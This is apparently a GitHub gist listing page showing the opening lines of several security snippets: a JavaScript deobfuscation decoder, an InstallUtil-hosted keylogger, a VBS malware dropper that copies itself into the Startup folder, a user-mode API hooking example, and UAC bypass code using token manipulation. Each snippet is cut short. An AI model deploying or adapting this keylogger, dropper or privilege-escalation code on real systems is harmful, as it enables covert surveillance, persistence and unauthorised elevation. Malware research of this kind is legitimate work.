aaaddress1
/ index.js
Last active
August 29, 2015 14:17
— forked from edokeh/index.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // _oo0oo_ | |
| // o8888888o | |
| // 88" . "88 | |
| // (| -_- |) | |
| // 0\ = /0 | |
| // ___/`---'\___ | |
| // .' \\| |// '. | |
| // / \\||| : |||// \ | |
| // / _||||| -:- |||||- \ |
aaaddress1
/ super_decoder.js
Created
October 10, 2016 12:13
— forked from Inndy/super_decoder.js
Decode jsfuck / aaencode / jjencode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| !function () { | |
| var global = this; | |
| var old_eval = global.eval; | |
| var old_const = global.Function.prototype.constructor; | |
| global.Function.prototype.constructor = function (code) { | |
| console.log('Function Constructor: ' + code); | |
| return old_const(code); | |
| }; | |
| global.eval = function (code) { | |
| console.log('EVIL: ' + code); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* @file: brainFuckCppCall.cpp | |
| * @author: aaaddress1@chroot.org | |
| */ | |
| #include <stdio.h> | |
| #include <Windows.h> | |
| template<class T> struct func { | |
| explicit func(FARPROC ptr) : _ptr(ptr) {} | |
| operator T() { return reinterpret_cast<T>(_ptr); } | |
| FARPROC _ptr; |
aaaddress1
/ InstallUtilMouseKeyLogger.cs
Created
February 26, 2018 20:27
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Windows.Forms; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //KeyStroke Mouse Clicks Code | |
| /* | |
| * https://code.google.com/p/klog-sharp/ | |
| */ |
aaaddress1
/ garenaMalwareDropper.vbs
Created
March 3, 2018 10:56
Garena Malware Dropper (2018/03/03)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Dim Wsh | |
| Set Wsh = Wscript.CreateObject("Wscript.Shell") | |
| Dim Objectfs | |
| Set Objectfs = CreateObject("Scripting.FileSystemObject") | |
| set fso = createobject("scripting.filesystemobject") | |
| set ws = createobject("wscript.shell") | |
| pt = ws.specialfolders("startup") & "\" | |
| set file = fso.getfile(wscript.scriptfullname) | |
| If Objectfs.FileExists(pt & "r.vbe") Then | |
| else |
aaaddress1
/ Injectable.cpp
Created
May 31, 2018 07:23
— forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| FARPROC fpCreateProcessW; | |
| BYTE bSavedByte; | |
| // Blog Post Here: | |
| // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
| // tasklist | findstr explore.exe |
aaaddress1
/ update
Created
January 14, 2020 13:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ooo |
aaaddress1
/ uacbypasstokenmanipulation.py
Created
January 30, 2020 17:39
— forked from dezhub/uacbypasstokenmanipulation.py
Fileless AlwaysNotify UAC Bypass using CIA Vault7's Token Manipulation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| # All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :)) | |
| # This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True. | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| from enum import IntEnum | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| shell32 = WinDLL('shell32' , use_last_error=True) |
aaaddress1
/ uacbypasstokenmanipulation.py
Created
January 30, 2020 17:39
— forked from dezhub/uacbypasstokenmanipulation.py
Fileless AlwaysNotify UAC Bypass using CIA Vault7's Token Manipulation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| # All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :)) | |
| # This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True. | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| from enum import IntEnum | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| shell32 = WinDLL('shell32' , use_last_error=True) |
aaaddress1
/ gist:a9f3fec5e382a6e471c45f191da36021
Created
January 30, 2020 17:39
— forked from hfiref0x/gist:59c689a14f1fc2302d858ae0aa3f6b86
CIA Stinger UAC bypass (likely)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DWORD Error, bytesIO; | |
| NTSTATUS Status; | |
| HANDLE hProcessToken = NULL, hNewToken = NULL, hTest; | |
| BOOL bCond = FALSE; | |
| SHELLEXECUTEINFO shinfo; | |
| SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY; | |
| TOKEN_MANDATORY_LABEL tml, *ptml; | |
| PSID pIntegritySid = NULL; | |
| STARTUPINFO si; | |
| PROCESS_INFORMATION pi; |
OlderNewer